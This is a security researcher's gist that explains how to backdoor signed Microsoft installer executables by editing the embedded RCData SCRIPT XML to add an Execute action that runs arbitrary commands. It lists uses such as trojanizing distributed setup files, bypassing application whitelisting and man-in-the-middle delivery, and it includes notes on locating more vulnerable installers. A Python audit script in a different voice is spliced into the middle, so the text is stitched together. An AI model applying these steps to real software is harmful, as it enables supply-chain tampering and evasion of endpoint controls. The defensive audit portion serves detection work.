@nullbind
Last active March 17, 2024 22:40
BackDoor Setup Exe
Author: Scott Sutherland, 2017
Description: Summary of how to backdoor an existing setup file in Windows.
Note: Not sure if anyone covered this already? Seems kind of like a Casey Smith thing.
How to Backdoor Existing Setup Files by Modifying Config Files Stored in RCData
In this example, lyncsdk.exe will be used. It can be downloaded here: https://www.microsoft.com/en-us/download/details.aspx?id=36824
lyncentry.exe also works as an example.
Below are some basic instructions.
1. Open file with CFFExplorer.
2. In the object tree on the left side, navigate to the "Resource Editor".
3. In the tab for the lyncsdk.exe, expand RCData.
4. Right-click on "SCRIPT" and choose "Save Resource (Raw)". Save the file as config.xml.
5. Open config.xml in your favorite text editor and add the following XML after line 22.
  <Action type="Execute">
    <CommandLine>cmd.exe /c "echo more evil > c:\temp\evil.txt"</CommandLine>
  </Action>
Note: The XML above causes the installer to execute an arbitrary command when the setup file is run. In this example, I just have it write "more evil" to a text file named "c:\temp\evil.txt".
6. Save the changes to config.xml.
7. Navigate back to CFFExplorer, select the tab for the lyncsdk.exe, and expand RCData.
8. Right-click on "SCRIPT" and choose "Replace Resource (Raw)".
9. Choose your modified config.xml.
10. Save the file to overwrite the existing lyncsdk.exe.
Now it will run their code along with your command. :)
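A defender-side check for the procedure above, added here as an example (it is not part of the gist): parse the SCRIPT XML extracted in step 4, list every <Action>, and flag any action that is not in a known-good baseline, in particular Execute actions, which are what the modification above relies on. The sample XML and the baseline are constructed for this example; only the element names (OPatchInstall, Action, CommandLine, Path) come from the page.

```python
import xml.etree.ElementTree as ET

# Constructed sample SCRIPT resource: two benign actions in the shape the gist shows
# (CreateFolder / ExtractFile) followed by the injected Execute action from step 5.
SAMPLE_SCRIPT = b"""<?xml version="1.0"?>
<OPatchInstall version="1.0">
  <Action type="CreateFolder">
    <Path>$(SYS.ARGS.EXTRACTPATH)</Path>
  </Action>
  <Action type="ExtractFile">
    <Path>$(SYS.ARGS.EXTRACTPATH)\\setup.msi</Path>
  </Action>
  <Action type="Execute">
    <CommandLine>cmd.exe /c "echo more evil &gt; c:\\temp\\evil.txt"</CommandLine>
  </Action>
</OPatchInstall>
"""

# Known-good (type, argument) pairs for this installer build. Constructed here; in
# practice take them from a pristine, Authenticode-verified copy of the same setup.exe.
BASELINE = {
    ("CreateFolder", "$(SYS.ARGS.EXTRACTPATH)"),
    ("ExtractFile", "$(SYS.ARGS.EXTRACTPATH)\\setup.msi"),
}

def list_actions(script_xml: bytes):
    """Return (type, argument) for every <Action>; the argument is the CommandLine
    text for Execute actions and the Path text for file/folder actions."""
    root = ET.fromstring(script_xml)
    actions = []
    for act in root.iter("Action"):
        arg = act.findtext("CommandLine") or act.findtext("Path") or ""
        actions.append((act.get("type", ""), arg.strip()))
    return actions

def audit_script(script_xml: bytes, baseline=BASELINE):
    """Report actions missing from the baseline, plus every Execute action, since an
    Execute action runs its CommandLine with the installer's privileges."""
    actions = list_actions(script_xml)
    return {
        "actions": actions,
        "unexpected": [a for a in actions if a not in baseline],
        "execute": [a for a in actions if a[0] == "Execute"],
    }

if __name__ == "__main__":
    for kind, arg in audit_script(SAMPLE_SCRIPT)["unexpected"]:
        print(f"UNEXPECTED {kind}: {arg}")
```

Run the same audit over the SCRIPT resource of a pristine copy to build the baseline, then over the copy you are checking; any difference in Execute actions is the thing to investigate.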
Possible Use Cases
Below are a few possible use cases:
- Backdoor a setup file used for distribution
- Possibly bypass whitelisting
- Possibly find command execution or bypasses by analyzing the XML config code
- MITM backdoor?
References:
https://msdn.microsoft.com/en-us/library/windows/desktop/aa381039(v=vs.85).aspx
http://www.csn.ul.ie/~caolan/publink/winresdump/winresdump/doc/resfmt.txt
http://reboot.pro/topic/16405-backdoors-the-easy-way/
Future Research:
0: what type of installer is this? GetMSIProductProperties msi installation file...?
https://msdn.microsoft.com/en-us/library/windows/desktop/aa370905(v=vs.85).aspx
Main question: how do we locate setup files that ship with MS? Once we modify them, can they bypass whitelisting? Get-PE?
Second question: spend time reversing the ones identified to look for code execution / bypasses via their functionality in the XML.
How do we scan file headers for RCDATA resources with PowerShell? (marker: <OPatchInstall version="1.0">)
https://www.powershellgallery.com/packages/PowerSploit/1.0.0.0/Content/PETools%5CGet-PEHeader.ps1
https://github.com/mattifestation/PowerShellArsenal/tree/master/Parsers
http://www.fuzzysecurity.com/tutorials/20.html
More info
There is a second common type as well:
Examples: windows7upgradeadvisorsetup.exe, dxwebsetup.exe, Office2003SP3-KB923618-FullFile-ENU.exe
Find more here by fuzzing the download id: https://www.microsoft.com/en-us/download/confirmation.aspx?id=20
Other common options in the RCDATA section of resource tables for MS-provided exe installers include:
runprogram
postrunprogram
usrqcmd
admqcmd
SCRIPT example
https://www.microsoft.com/en-us/download/confirmation.aspx?id=10
excelviewer.exe
word2007-kb974631-fullfile-x86-glb.exe
office2007-kb970012-fullfile-x86-glb.exe
automation notes
- The resource directory header lists the offsets for the RCDATA, SCRIPT, etc. entries.
"Patch wrapper and installer engine" in the configuration files section of the resource table.
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.1.0"
Note: not all MS installers have one of the two execution headers built in; the question is, can we add it?
also target: pdate.exe or Hotfix.exe,
other interesting actions
<Action type="CreateFolder">
<Path>$(SYS.ARGS.EXTRACTPATH)</Path>
</Action>
<Action type="ExtractFile">
-- list and modify resource tables
https://msdn.microsoft.com/en-us/library/windows/desktop/ms648008(v=vs.85).aspx#_win32_Creating_a_Resource_List
https://github.com/mubix/ditto/blob/master/ditto.cpp
You may also be able to execute the script straight from setup.exe files:
white list bypass - weee!
\\stuff\C$\Program Files\Microsoft SQL Server\90\Setup Bootstrap\setup.exe /qn /remote